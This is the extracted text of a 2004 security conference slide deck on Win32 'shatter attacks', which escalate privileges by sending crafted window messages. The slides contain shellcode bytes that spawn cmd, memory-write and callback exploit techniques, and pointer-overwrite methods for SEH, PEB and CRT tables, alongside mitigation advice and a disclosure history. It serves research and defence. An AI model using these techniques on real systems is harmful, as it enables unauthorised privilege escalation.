Скачать презентацию Security-Assessment com Shoot The Messenger win 32 Shatter Скачать презентацию Security-Assessment com Shoot The Messenger win 32 Shatter

b21a60a4464f7ea816e93ac3f8175764.ppt

  • Количество слайдов: 55

Security-Assessment. com Shoot The Messenger “win 32 Shatter Attacks” Presented By Brett Moore Copyright Security-Assessment. com Shoot The Messenger “win 32 Shatter Attacks” Presented By Brett Moore Copyright Security-Assessment. com 2004

Security-Assessment. com Corporate Disclaimer The information included in this presentation is for research and Security-Assessment. com Corporate Disclaimer The information included in this presentation is for research and educational purposes only, and is not to be used outside these areas. Exploit code, where used, is included only for example purposes. Security-Assessment. com does not warrant accuracy of information provided, and accepts no liability in any form whatsoever for misuse of this information. Copyright Security-Assessment. com 2004

Security-Assessment. com Historically § Shatter attacks started out as interesting Although they were essentially Security-Assessment. com Historically § Shatter attacks started out as interesting Although they were essentially a new class of vulnerability, they were considered more a ‘one off’ novelty than a serious threat § MS has had serious security issues in the past The swiss cheese operating system § Highly secure networks protected with standard security measures § Access only for permanent employees with long job history § Thick client model § Non MS workstations with secure builds and secure hardware (no floppy, CD, USB, etc) Copyright Security-Assessment. com 2004

Security-Assessment. com Currently § Shatter attacks are starting to widen their scope But they Security-Assessment. com Currently § Shatter attacks are starting to widen their scope But they are still local-local privilege escalation § MS is starting to get serious about patching, Patch management, built in firewalling, XP SP 2 etc have been forced by customer pressure § Highly secure networks now § Have contractors all over the place, and employees with short term job history § Employee loyalty at all time low due to the loss of the ‘job for life’ mentality § Windows machines starting to get everywhere as a client machine of choice Copyright Security-Assessment. com 2004

Security-Assessment. com What’s To Come § Shatter attacks are going to expand This presentation Security-Assessment. com What’s To Come § Shatter attacks are going to expand This presentation will demonstrate the direction in which these attacks are heading § Windows will be used as a secure platform § Highly secure networks will § Have contractors all over the place, and employees with short term job history § Employee loyalty at all time low due to the loss of the ‘job for life’ mentality And § Windows machines all over the place that have ‘Secure Builds’ that are trusted to preserve and control access to the network and data, and to control the user’s privileges and actions Copyright Security-Assessment. com 2004

Security-Assessment. com The Bottom Line § Shatter attacks affect the core of the OS Security-Assessment. com The Bottom Line § Shatter attacks affect the core of the OS It is going to take a long to time to fix this problem It may never be fixed but may be mitigated on a patch per case basis § It’s not just Microsoft products All third party services are potentially exploitable Are the products you buy/sell allowing users to gain elevated privileges § Pay attention If people don’t pay attention, then in 12 months time you are going to be running a ‘secure network’ with ‘locked down builds’ and everything you trust to keep you secure will be rotten at the very core of what you trust Copyright Security-Assessment. com 2004

Security-Assessment. com Real World Exploitation § Privilege escalation This is the major impact shatter Security-Assessment. com Real World Exploitation § Privilege escalation This is the major impact shatter attacks have Local, yes, but think citrix and remote desktop Exploitable by viruses, worms and other malicious code § Third party applications Personal firewalls Antivirus applications Monitoring and time tracking systems § Any windows user has access > administrator Install keyloggers, network sniffers and remote access tools Bypass restrictions based on access level Obtain and crack local password files Copyright Security-Assessment. com 2004

Security-Assessment. com Consequences Of The Problem § Application runs with higher privileges It may Security-Assessment. com Consequences Of The Problem § Application runs with higher privileges It may be possible to escalate users privileges § Application disables / hides features It may be possible to obtain unauthorised access § Unauthorised application closing It may be possible to close applications running to monitor usage § Target app uses GUI text for SQL queries It may be possible to exploit classic SQL injection attacks § Target app uses GUI text for file access It may be possible to gain arbitrary file access Copyright Security-Assessment. com 2004

Security-Assessment. com Windows Messaging § Windows applications wait for input Input is passed in Security-Assessment. com Windows Messaging § Windows applications wait for input Input is passed in the form of messages which are managed by the system and directed to the appropriate windows § Window handle Every window or control has a unique window handle associated with it which is used as the destination address when passing messages § The problem Currently there is no method to determine the sender of a message so it is possible for any user to send arbitrary messages to applications Copyright Security-Assessment. com 2004

Security-Assessment. com Message Routing § Methods Posting to message queue Post. Message() – posts Security-Assessment. com Message Routing § Methods Posting to message queue Post. Message() – posts to queue and returns immediately Sending to window procedure Send. Message() – sends to wnd. Proc and waits for return § Message queues Single system message queue One thread-specific message queue for each GUI thread Created when the thread makes its first call to a GDI function § Window procedure Every window is created with a window procedure Receives and processes all messages sent to the window Shared by all windows belonging to the same class Copyright Security-Assessment. com 2004

Security-Assessment. com Message Handling App { Post. Message() } Thread Message Queue Message Loop Security-Assessment. com Message Handling App { Post. Message() } Thread Message Queue Message Loop Get. Message() Translate. Message() Dispatch. Message() Window Procedure Act. On. Message() { Send. Message() } Copyright Security-Assessment. com 2004 or Def. Winow. Proc()

Security-Assessment. com Message Type By Parameter § Type 1 – Used to pass a Security-Assessment. com Message Type By Parameter § Type 1 – Used to pass a string to target app Data is correctly marshaled, resulting in data transfer to the target application § Type 2 – Used to pass a long to target app No marshalling is required and the data is used directly, resulting in the setting of some value in the target application § Type 3 – Used to overwrite memory A pointer to a structure is passed which is not correctly marshaled, resulting in the overwriting of memory in the target application Copyright Security-Assessment. com 2004

Security-Assessment. com Message Marshalling § msdn The system only does marshalling for system messages Security-Assessment. com Message Marshalling § msdn The system only does marshalling for system messages (those in the range 0 to WM_USER). To send other messages (those above WM_USER) to another process, you must do custom marshalling § 0 -0 x 3 FF (0. . WM_USER-1): System-defined Defined by Windows so the operating system understands how to parse the WPARAM and LPARAM parameters and can marshal the messages between processes § 0 x 400 -0 x. FFFF (WM_USER. . MAX): User-defined Since anybody can create a message in this range, the operating system does not know what the parameters mean and cannot perform automatic marshalling Copyright Security-Assessment. com 2004

Security-Assessment. com Marshaled Messages § < 0 x 400 automatically marshaled winuser. h #define Security-Assessment. com Marshaled Messages § < 0 x 400 automatically marshaled winuser. h #define WM_USER #define WM_SETTEXT 0 x 0400 0 x 000 C § > 0 x 400 not automatically marshaled commctrl. h #define HDM_FIRST 0 x 1200 #define HDM_GETITEMRECT (HDM_FIRST + 7) richedit. h #define EM_FINDTEXT Copyright Security-Assessment. com 2004 (WM_USER + 56)

Security-Assessment. com Auto Marshaled Data § Marshalling is done on a per message basis Security-Assessment. com Auto Marshaled Data § Marshalling is done on a per message basis Marshaled messages may be exploitable, dependant on usage Pointers to pointers are inherently unsafe § Parameter is used directly Send. Message(h. Wnd, WM_TIMER, 1, (TIMERPROC *)) (TIMERPROC *) is passed to win. Proc without changing § Parameter is ptr to data Send. Message(h. Wnd, WM_SETTEXT, 0, (LPCTSTR)) Data at (LPCTSTR) is copied to target process mapped heap Message is processed with an updated (LPCTSTR) Data is copied from target to sender if required Copyright Security-Assessment. com 2004

Security-Assessment. com GDI Shared Handle Table PEB typedef struct { DWORD p. Kernel. Info; Security-Assessment. com GDI Shared Handle Table PEB typedef struct { DWORD p. Kernel. Info; // 2000/XP, inverted in NT WORD Process. ID; WORD _n. Count; Process Mapped Heap WORD n. Upper; WORD n. Type; DWORD p. User. Info; } GDITable. Entry; HEAP 0 x 7 ffdf 000. . 0 x 7 ffdf 094. . + 0 x 60000 § Holds GDI object handles from all processes § 0 x 4000 GDITable. Entry entries Copyright Security-Assessment. com 2004

Security-Assessment. com Process Mapped Heap (R/X) Attack App HEAP (mapped) 0 x 490000 BASE Security-Assessment. com Process Mapped Heap (R/X) Attack App HEAP (mapped) 0 x 490000 BASE Target App Static Diff + 0 x. A 0000 = HEAP (mapped) 0 x 530000 BASE . . 0 x 5238 c 0 DATA . . + 0 x. A 0000 . . 0 x 5 c 38 c 0. . Copyright Security-Assessment. com 2004 DATA

Security-Assessment. com Shellcode § Small Usually only requires calling system(“cmd”) Can contain null bytes Security-Assessment. com Shellcode § Small Usually only requires calling system(“cmd”) Can contain null bytes BYTE exploit[] = "x 68x 63x 6 dx 64x 00x 54xb 9xc 3xafx 01x 78xffxd 1"; § Exploiting locally All relocatable address’s can be assigned at runtime h. Mod = Load. Library("msvcrt. dll"); Proc. Addr = (DWORD)Get. Proc. Address(h. Mod, "system"); *(long *)&exploit[8] = Proc. Addr; Copyright Security-Assessment. com 2004

Security-Assessment. com Passing NULL Bytes § Set. Window. Text. W Unicode function, will accept Security-Assessment. com Passing NULL Bytes § Set. Window. Text. W Unicode function, will accept NULL bytes but is terminated by wide character NULL GOOD BYTE exploit[] = "x 68x 63x 6 dx 64x 00x 54xb 9xc 3xafx 01x 78xffxd 1"; GOOD BYTE exploit[] = "x 68x 63x 6 dx 00x 54xb 9xc 3xafx 01x 78xffxd 1"; BAD BYTE exploit[] = "x 68x 63x 6 dx 64x 00xb 9xc 3xafx 01x 78xffxd 1"; Copyright Security-Assessment. com 2004

Security-Assessment. com Writing NULL Bytes § Set. Window. Text. W Same address is used Security-Assessment. com Writing NULL Bytes § Set. Window. Text. W Same address is used if length is <= previous § Using multiple messages, write shellcode backwards 0 x 0101 0 x 00020000 0 x 0303 Copyright Security-Assessment. com 2004 00511858 00511860 03 03 03 00 00 00511858 00511860 03 03 03 02 00 03 03 00 00 00511858 00511860 x 01x 01 x 00x 02x 00 x 03x 03 03 00 02 00 03 03 00 00 00511858 00511860 01 01 00 00 02 00 03 03 00 00

Security-Assessment. com Finding Shellcode Address § Brute force methods Can automatically handle errors, No Security-Assessment. com Finding Shellcode Address § Brute force methods Can automatically handle errors, No good for ‘one shot’ exploits § Arbitrary byte writing Allows the writing of bytes to a known location § Arbitrary memory reading Statusbar exploit § GDI shared heap Chris Paget – Messagebox / Brute force § Process mapped heap Set. Window. Text. W / Read. Process. Memory Copyright Security-Assessment. com 2004

Security-Assessment. com Set. Window. Text. W / Read. Process. Memory § Find heap offset Security-Assessment. com Set. Window. Text. W / Read. Process. Memory § Find heap offset Locate target app mapped heap base Read. Process. Memory(h. Process, 0 x 7 ffdf 094, &offset, 4, &bread) Target. Process. Mapped. Heap = offset + 0 x 060000 Locate attack app mapped heap base Gdi. Shared. Handle. Table = *(DWORD *)0 x 7 ffdf 094 Local. Process. Mapped. Heap = Gdi. Shared. Handle. Table + 0 x 060000 The static heap offset is the difference between the two Copyright Security-Assessment. com 2004

Security-Assessment. com Set. Window. Text. W / Read. Process. Memory § Find data address Security-Assessment. com Set. Window. Text. W / Read. Process. Memory § Find data address Use Set. Window. Text. W to inject our shellcode Search attack app heap for shellcode with Read. Process. Memory Adjust with heap offset to obtain shellcode address in target Attack App Target App {Read. Process. Memory} HEAP {Adjusted Address} Exploit {Set. Window. Text. W} Copyright Security-Assessment. com 2004 SHELLCODE HEAP Message Handler

Security-Assessment. com Callback Attacks § Pass address of shellcode in message sendmessage(h. WND, WM_MSG, Security-Assessment. com Callback Attacks § Pass address of shellcode in message sendmessage(h. WND, WM_MSG, 1, 0 x. ADDRESS) § The following accept callbacks as a parameter WM_TIMER (patched) EM_SETWORDBREAKPROC(EX) LVM_SORTITEMS(EX) § The following accept callbacks in a structure EM_STREAMIN / EM_STREAMOUT EM_SETHYPHENATEINFO TVM_SORTCHILDRENCB Copyright Security-Assessment. com 2004

Security-Assessment. com Callback Attacks Target App Attack App SHELLCODE Exploit {SET TEXT} {CALLBACK} Copyright Security-Assessment. com Callback Attacks Target App Attack App SHELLCODE Exploit {SET TEXT} {CALLBACK} Copyright Security-Assessment. com 2004 HEAP Message Handler

Security-Assessment. com Callback Attacks § Easy shatter – Ovidio Mallo Edit. Word. Break. Proc. Security-Assessment. com Callback Attacks § Easy shatter – Ovidio Mallo Edit. Word. Break. Proc. Ex( char *pch. Text, LONG cch. Text, BYTE b. Char. Set, INT code); ~ Load. Library( LPCTSTR lp. Lib. File. Name); § Return to libc Set. Unhandled. Exception. Filter( LPTOP_LEVEL_EXCEPTION_FILTER lp. Filter); system( char *command); Copyright Security-Assessment. com 2004

Security-Assessment. com EM_STREAMIN Exploit struct _editstream { DWORD dw. Cookie; DWORD dw. Error; CALLBACK Security-Assessment. com EM_STREAMIN Exploit struct _editstream { DWORD dw. Cookie; DWORD dw. Error; CALLBACK pfn. Callback; } CALLBACK Edit. Stream. Callback( DWORD dw. Cookie, LPBYTE pb. Buff, LONG cb, LONG *pcb ); ~ system( char *command); Copyright Security-Assessment. com 2004 Editstream Exploit Structure A 8 00 31 00 . . 1. 02 02 . . Ptr to System BF 8 E 01 78 ¿Ž. x Ptr to DATA 63 69 5 C 74 32 64 65 3 A 6 E 73 65 5 C 2 E 00 5 C 6 E 79 6 D 63 65 00 77 74 73 03 6 D 78 00 c: w innt sys tem 3 2cm d. ex e. . .

Security-Assessment. com Arbitrary Memory Writing Attacks § Some messages pass a pointer to a Security-Assessment. com Arbitrary Memory Writing Attacks § Some messages pass a pointer to a structure to receive size data By passing the address to overwrite we can write the first member of the structure to a controlled location § Paired with a message used to set size data By using a complimentary message to set the size, we can control the first member of the structure § This allows the writing of controlled bytes to a controlled location Copyright Security-Assessment. com 2004

Security-Assessment. com Writing Arbitrary Bytes (Listview) Attack App Exploit Address+8 {SET SIZE} Target App Security-Assessment. com Writing Arbitrary Bytes (Listview) Attack App Exploit Address+8 {SET SIZE} Target App Message Handler {REQUEST SIZE} LEFT TOP RIGHT BOT Send. Message(h. Wnd, LVM_SETCOLUMNWIDTH, 0, BYTE) Send. Message(h. Wnd, HDM_GETITEMRECT, 1, ADDRESS) Copyright Security-Assessment. com 2004

Security-Assessment. com Writing Arbitrary Bytes For Each Byte To Write { Send. Message(h. Wnd, Security-Assessment. com Writing Arbitrary Bytes For Each Byte To Write { Send. Message(h. Wnd, SET_SIZE_MSG, 0, MAKELPARAM([byte], 0)); Send. Message(h. Wnd, GET_SIZE_MSG, 1, [address]); address++; } 7 FFDF 100 48 65 6 C 6 C 6 F 20 57 6 F 00 00 Hello Wo He. . . H. . . . Hel. . . 7 FFDF 108 72 6 C 64 7 A 97 9 E 00 00 11 11 11 . . ž. . . —. . . z. . . . rld. . . 7 FFDF 110 00 00 32 . . 2. . . 7 FFDF 118 11 00 00 . . . . Copyright Security-Assessment. com 2004

Security-Assessment. com Message Pair Examples § List view LVM_SETCOLUMNWIDTH / HDM_GETITEMRECT § Tab view Security-Assessment. com Message Pair Examples § List view LVM_SETCOLUMNWIDTH / HDM_GETITEMRECT § Tab view TCM_SETITEMSIZE / TCM_GETITEMRECT § Progress bar PBM_SETRANGE / PBM_GETRANGE § Status bar SB_SETPARTS / SB_GETPARTS § Buttons (XP) BCM_SETTEXTMARGIN / BCM_GETTEXTMARGIN Copyright Security-Assessment. com 2004

Security-Assessment. com Overwrite SEH Target App Attack App {SET CODE} Exploit {OVERWRITE} {EXCEPTION} § Security-Assessment. com Overwrite SEH Target App Attack App {SET CODE} Exploit {OVERWRITE} {EXCEPTION} § Write shellcode to known writeable § Overwrite SEH using byte write § Cause exception Copyright Security-Assessment. com 2004 HEAP Message Handler SEH PEB SHELLCODE

Security-Assessment. com Overwrite PEB Lock Ptr § Can not write by byte, as pointer Security-Assessment. com Overwrite PEB Lock Ptr § Can not write by byte, as pointer is used between writes § Write shellcode to heap HEAP § Set address to the third byte 00079103 90 B 9 20 F 0 . ¹ ð § 0 x 00 is written to the fourth 00079107 FD 7 F B 8 03 ý. ¸. 0007910 B 91 F 8 77 89 ‘øw‰ Original 0 x 7 FFDF 020 03 91 F 8 77 0007910 F 01 89 41 04 . ‰A. 00079113 90 68 63 6 D . hcm 00079117 64 00 54 B 9 d. T¹ 0007911 B BF 8 E 01 78 ¿Ž. x 0007911 F FF D 1 CC 00 ÿÑÌ. New 0 x 7 FFDF 020 03 91 07 00 Copyright Security-Assessment. com 2004

Security-Assessment. com Overwrite PEB Lock Ptr Target App Attack App HEAP {SET CODE} Exploit Security-Assessment. com Overwrite PEB Lock Ptr Target App Attack App HEAP {SET CODE} Exploit {OVERWRITE} § Write shellcode to heap § Overwrite PEB using word write § Point into heap @ 0 x 00? ? XXXX Copyright Security-Assessment. com 2004 SHELLCODE Message Handler PEB

Security-Assessment. com Overwrite GDI Dispatch Table Ptr § Can not write by byte, as Security-Assessment. com Overwrite GDI Dispatch Table Ptr § Can not write by byte, as pointer is used between writes § Write shellcode to known location § Write pointer table to heap § Set address to the third byte HEAP PTR TO SHELLCODE § 0 x 00 is written to the fourth PEB SHELLCODE Copyright Security-Assessment. com 2004

Security-Assessment. com Overwrite GDI Dispatch Table Ptr Target App Attack App HEAP {SET CODE} Security-Assessment. com Overwrite GDI Dispatch Table Ptr Target App Attack App HEAP {SET CODE} Exploit {OVERWRITE} § Write shellcode to known writeable § Write ptr table to heap § Overwrite GDI using word write § Point into heap @ 0 x 00? ? XXXX Copyright Security-Assessment. com 2004 PTR TO SHELLCODE Message Handler PEB SHELLCODE

Security-Assessment. com Overwriting C Run-Time Terminators § crt 0 dat. c C run-time initialization Security-Assessment. com Overwriting C Run-Time Terminators § crt 0 dat. c C run-time initialization / termination routines § Terminators called from doexit() Called on normal or abnormal termination § _initterm(_PVFV * pfbegin, _PVFV * pfend) Walk a table of function pointers, calling each entry § Overwrite pointer in table with address of shellcode § Close process using WM_CLOSE message Or by causing an unhandled exception error Copyright Security-Assessment. com 2004

Security-Assessment. com Overwriting _initterm Table Entries exit() doexit() 780011 F 7 push 780011 FC Security-Assessment. com Overwriting _initterm Table Entries exit() doexit() 780011 F 7 push 780011 FC push 78001201 call 7800119 B 7800119 C 780011 A 0 780011 A 2 780011 A 5 780011 A 9 780011 AB 780011 AD 780011 AF 780011 B 1 780011 B 3 780011 B 5 push mov jmp add cmp jae mov test je call jmp pop Copyright Security-Assessment. com 2004 esi, dword ptr [esp+8] 780011 A 5 esi, 4 esi, dword ptr [esp+0 Ch] 780011 B 5 eax, dword ptr [esi] eax, eax 780011 A 2 esi 7803 A 154 h 7803 A 14 Ch 7800119 B _initterm

Security-Assessment. com Buffer Overflows § Windows messages pass user input Similar to other user Security-Assessment. com Buffer Overflows § Windows messages pass user input Similar to other user input based security issues, the input should be sanitized before it is used, § LB_DIR / CB_DIR Overflow In this case, the data was marshaled correctly but the length of the path was not checked before it was used, resulting in a buffer overflow § Text Length Checking ’Writing Secure Code’ advises that to avoid buffer overflows you should check the length of the requested text before using any of the following messages; TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING, SB_GETTEXT TVM_GETISEARCHSTRING, TTM_GETTEXT, CB_GETLBTEXT, SB_GETTIPTEXT, LB_GETTEXT Good advice, but…. Copyright Security-Assessment. com 2004

Security-Assessment. com Text Retrieval Messages § It may not prevent exploitation TB_GETBUTTONTEXTA LVM_GETISEARCHSTRINGA TVM_GETISEARCHSTRINGA Security-Assessment. com Text Retrieval Messages § It may not prevent exploitation TB_GETBUTTONTEXTA LVM_GETISEARCHSTRINGA TVM_GETISEARCHSTRINGA SB_GETTEXTA SB_GETTIPTEXTA TTM_GETTEXTA (WM_USER + 45) (LVM_FIRST + 52) (TV_FIRST + 23) (WM_USER+2) (WM_USER+18) (WM_USER +11) § Race Conditions This process of requesting the length, setting up a buffer, and then requesting the text, could also open up the possibility of race conditions. Copyright Security-Assessment. com 2004

Security-Assessment. com Discovery Tools Locate Applications § Spy ++ - Visual Studio § Task Security-Assessment. com Discovery Tools Locate Applications § Spy ++ - Visual Studio § Task Manager Windows 2000 - can’t close apps running under system Windows XP - Displays user applications run under § Process Explorer – www. sysinternals. com Locate Vulnerable Messages Through Fuzzing Enumerate through messages, passing ‘fuzzy’ parameters Copyright Security-Assessment. com 2004

Security-Assessment. com Undocumented Application Messages § winhlp 32 loaded as system § Run fuzzer Security-Assessment. com Undocumented Application Messages § winhlp 32 loaded as system § Run fuzzer passing 1 01016 C 13 test byte ptr [edi+3], 2 01016 C 17 je 01016 C 2 D § Point EDI to block of 0 x 1111 and continue Copyright Security-Assessment. com 2004

Security-Assessment. com Undocumented Application Messages § Next exception 01007 E 3 D cmp word Security-Assessment. com Undocumented Application Messages § Next exception 01007 E 3 D cmp word ptr [esi+20 h], di 01007 E 41 ja 01007 E 5 D § Point ESI to our block of 0 x 1111, continue § Final exception First-chance exception in winhlp 32. exe: 0 x. C 0000005: Access Violation. 01007 EA 8 push eax 01007 EA 9 call dword ptr [esi+36 h] 01007 EAC inc dword ptr [ebp+8] Copyright Security-Assessment. com 2004 EAX = 0006 F 198 EBX = 00000002 ECX = 00001402 EDX = 0000 ESI = 1111 EDI = 0000

Security-Assessment. com Undocumented Application Messages § Complex callback exploit § Send message passing address Security-Assessment. com Undocumented Application Messages § Complex callback exploit § Send message passing address of pointer 1 block § EDI set to address of pointer 1 block § ESI loaded with address of pointer 2 block § [ESI+36] points to pointer to shellcode Copyright Security-Assessment. com 2004 Winhlp 32. exe Exploit Structure Pointer 1 Block of pointers pointing to pointer 2 Pointer 2 Block of pointers pointing to shellcode Shellcode Code to be executed

Security-Assessment. com Unintentional Functionality § Some controls have default message handling LB_DIR message sent Security-Assessment. com Unintentional Functionality § Some controls have default message handling LB_DIR message sent to utilman reads directories as SYSTEM user Copyright Security-Assessment. com 2004

Security-Assessment. com Unintentional Application Loading § Html. Help() API Viewer loaded as system § Security-Assessment. com Unintentional Application Loading § Html. Help() API Viewer loaded as system § Common file dialog Open with cmd. exe § Context sensitive help Winhlp 32. exe loaded as system Copyright Security-Assessment. com 2004

Security-Assessment. com Thick Client Shatter Attacks § Request password for selected itemdata § Attacker Security-Assessment. com Thick Client Shatter Attacks § Request password for selected itemdata § Attacker changes selected item § Log in user for selected itemdata ITEMDATA TEXT 1 Admin 2 User Copyright Security-Assessment. com 2004 ITEMDATA {LB_SETCURSEL} TEXT 1 Admin 2 User

Security-Assessment. com Future Of Windows GUI Attacks § Attacks will move away from messages Security-Assessment. com Future Of Windows GUI Attacks § Attacks will move away from messages Attacks will be found that exploit APIS that manipulate window data through other methods. § Cross winstation / desktop attacks There may be loopholes allowing for attacks across these boundaries § As long as there accessible windows These attacks are not going to be solved overnight They affect more than just the core windows OS Every third party application running under the SYSTEM context may be exploitable Copyright Security-Assessment. com 2004

Security-Assessment. com Parenting Problems § So far unexploitable Example of a theoretical attack we Security-Assessment. com Parenting Problems § So far unexploitable Example of a theoretical attack we have so far been unable to exploit in a ‘real world’ situation. § Set. Parent() API msdn states “An application can use the Set. Parent function to set the parent window of a pop-up, overlapped, or child window. The new parent window and the child window must belong to the same application. ” § Woops, that’s not quite right. In reality, any application can set the parent of any other application created window. Copyright Security-Assessment. com 2004

Security-Assessment. com Parenting Problems Theory § Exploit becomes parent § Target app calls Get. Security-Assessment. com Parenting Problems Theory § Exploit becomes parent § Target app calls Get. Parent() to obtain handle to parent window § Target requests data from parent window § Exploit supplies corrupt data leading to exploitation Copyright Security-Assessment. com 2004

Security-Assessment. com Windows Properties § What are properties Window properties are used to store Security-Assessment. com Windows Properties § What are properties Window properties are used to store data associated with a window They can store any type of information and are application specific § The functions Get. Prop() retrieves the data from a property of the specified h. Wnd Set. Prop() sets the data of a property of the specified h. Wnd § The problem Any application can set any property value of any other window § No ‘core services’ vulnerable We have been unable to exploit any of the default windows services But…. Copyright Security-Assessment. com 2004

Security-Assessment. com Windows Properties § Afx. Old. Wnd. Proc 423 MFC subclasses all non-MFC Security-Assessment. com Windows Properties § Afx. Old. Wnd. Proc 423 MFC subclasses all non-MFC derived windows to handle specific activation issues. While subclassing a non-MFC created window, the old window procedure is stored in the properties of the window. § Window. Proc in a property This address is chained through the subclassed window proc and can be overwritten allowing for execution flow control The First Third Party Application Tested Was Vulnerable Copyright Security-Assessment. com 2004

Security-Assessment. com Application Protection Thoughts § Message filtering Too many known and unknown messages Security-Assessment. com Application Protection Thoughts § Message filtering Too many known and unknown messages to block the dangerous ones Only allowing the safe messages can be very tricky to implement throughout an application, and how can you be sure they are safe? As we have shown, it is not just message handlers that are vulnerable § Limited privilege Windows should not be created with higher privileges Beware Revert. To. Self() exploitation § Application defined messages Ensure any messages you define are handled safely As with any type of user input, data should be validated first Copyright Security-Assessment. com 2004

Security-Assessment. com Application Protection Thoughts § Service should talk to GUI Using RPC, sockets, Security-Assessment. com Application Protection Thoughts § Service should talk to GUI Using RPC, sockets, named pipes, or COM for communication from service to GUI § Disable interactive services HKLMSYSTEMCurrent. Control. SetControlWindowsNo. Interactive. Services Defaults to zero allowing services with SERVICE_INTERACTIVE_PROCESS to run interactively When set to a nonzero value, no service started thereafter is allowed to run interactively, regardless of SERVICE_INTERACTIVE_PROCESS § Understanding the threat Hopefully this presentation has helped you do just that Copyright Security-Assessment. com 2004

Security-Assessment. com Some History 2000 - 07 - Dil. Dog Windows Still Image Privilege Security-Assessment. com Some History 2000 - 07 - Dil. Dog Windows Still Image Privilege Elevation 2000 - 08 - Justin E. Forrester and team An Empirical Study of the Robustness of NT Applications Using Random Testing 2002 - 05 - Simeon Xenitellis Security Vulnerabilities In Event-Driven Systems 2002 - 05 - Chris Paget Shatter Attacks - How to break Windows. 2002 - 07 - Simeon Xenitellis Security Vulnerabilities In Event-Driven Systems (revised) 2002 - 08 - Chris Paget More on Shatter 2002 - 12 - Microsoft Security Bulletin MS 02 -071 (WM_TIMER) 2003 - 07 - Oliver Lavery Win 32 Message Vulnerabilities Redux 2003 - 07 - Microsoft Security Bulletin MS 03 -025 (LVM_Sort. Items workaround) 2003 - 10 - Brett Moore Shattering By Example 2003 - 10 - Microsoft Security Bulletin MS 03 -045 (LB_DIR / CB_DIR) 2004 - Microsoft Security Bulletin MS 04 -011 (Utility Manager Winhlp 32 Priv Escalation) 2004 - 07 - Microsoft Security Bulletin MS 04 -019 (Utility Manager Winhlp 32 Priv Escalation #2) Copyright Security-Assessment. com 2004